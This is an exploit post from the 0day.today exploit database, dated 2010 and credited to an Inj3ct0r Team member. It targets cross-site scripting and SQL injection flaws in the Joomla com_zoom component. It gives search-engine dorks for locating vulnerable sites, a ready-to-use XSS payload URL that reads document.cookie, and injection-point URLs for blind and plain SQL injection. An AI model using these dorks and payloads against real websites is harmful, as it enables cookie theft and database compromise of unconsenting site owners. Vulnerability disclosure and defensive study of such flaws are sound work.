[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_zoom (XSS/Blind SQLi/SQL Injection) Vulnerability

Author
SixP4ck3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6604
Category
web applications
Date add
13-07-2010
Platform
php
======================================================================
Joomla Component com_zoom (XSS/Blind SQLi/SQL Injection) Vulnerability
======================================================================


#######################################
I'm SixP4ck3r member from Inj3ct0r Team
#######################################

Author : SixP4ck3r
Email & msn : SixP4ck3r@Bolivia.com
Date : 13 July 2010
Critical Lvl : High
Impact : Exposure of sensitive information
Where : From Remote
web : http://foro.nbsecurity.net/
Credits : inj3ct0r Team, L0rd CrusAd3r, Chip D3 Bi0s
Dork : inurl:com_zoom
  : inurl:com_zoom/www/view.php?popup= catid
---------------------------------------------------------------------------
[add Valid_catid]
How to exploit XSS

index.php?index.php?option=com_zoom&Itemid=2&catid=2&PageNo=<script>alert(document.cookie)</script>

---------------------------------------------------------------------------

How to exploit BLSi

components/com_zoom/www/view.php?popup=1&catid=[BSi]&key=2&hit=1
---------------------------------------------------------------------------

How to exploit SQLi

components/com_zoom/www/view.php?popup=1&catid=[SQLi]&key=11&hit=1
---------------------------------------------------------------------------
With R3gards,
SixP4ck3r from Bolivia
___eof____




#  0day.today [2024-07-02]  #